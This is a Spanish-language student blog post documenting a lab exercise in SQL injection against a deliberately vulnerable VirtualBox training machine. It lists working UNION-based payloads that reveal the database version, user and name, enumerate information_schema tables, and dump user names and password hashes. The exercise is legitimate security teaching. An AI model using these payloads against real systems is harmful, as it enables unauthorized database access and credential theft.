miércoles, 28 de septiembre de 2016

Unidad 2. Tarea 2

TAREA 2: SQL injection
Aqui vamos a usar la técnica SQL injection para obtener información relevante sobre la estructura de una base de datos, vamos a obtener información de usuarios de un servidor (nombre de usuario, hash de la contraseña) a partir de un ataque de SQL injection.
Para ello necesitaras usar una máquina virtual preparada para el software de simulación VirtualBox. Si no tienes instalado VirtualBox puedes descargar el instalador desde la siguiente página web:
Ya una vez descargada podemos iniciarlo
Cuando termine de iniciarse la máquina virtual obtendremos  la dirección IP que ha obtenido por DHCP y que deberemos usar posteriormente para conectarnos a ella.
Una vez anotada la dirección IP y mediante el navegador web accede a la dirección proporcionada.
Entonces ponemos el user y password y entramos a la siguiente pagina
Tenemos que cambiar el nivel de seguridad a low:
Como siguiente paso nos vamos hacia SQL injection y realizamos una búsqueda al ID1


Aquí vamos a mostrar todos los registros que son falsos y  los registros que son verdaderos, con el siguiente comando %' or '0'='0



Si queremos saber que versión de base de datos están utilizando escribimos el siguiente comando %' or 0=0 union select null, version() #


Si queremos mostrar los usuarios de la base de datos escribimos el siguiente comando, %' or 0=0 union select null, user() #
Si queremos mostrar el nombre de la base de datos ponemos  el siguiente comando %' or 0=0 union select null, database() #

Mostrar todas las tablas de INFORMATION_SCHEMA (esquema de la base)
%' and 1=0 union select null, table_name from information_schema.tables #



Mostrar todas las tablas de usuario de INFORMATION_SCHEMA %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#



Mostrar todas las columnas de campo de contenidos en la tabla de usuario INFORMATION_SCHEMA utilizaremos el siguiente comando
%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #











No hay comentarios:

Publicar un comentario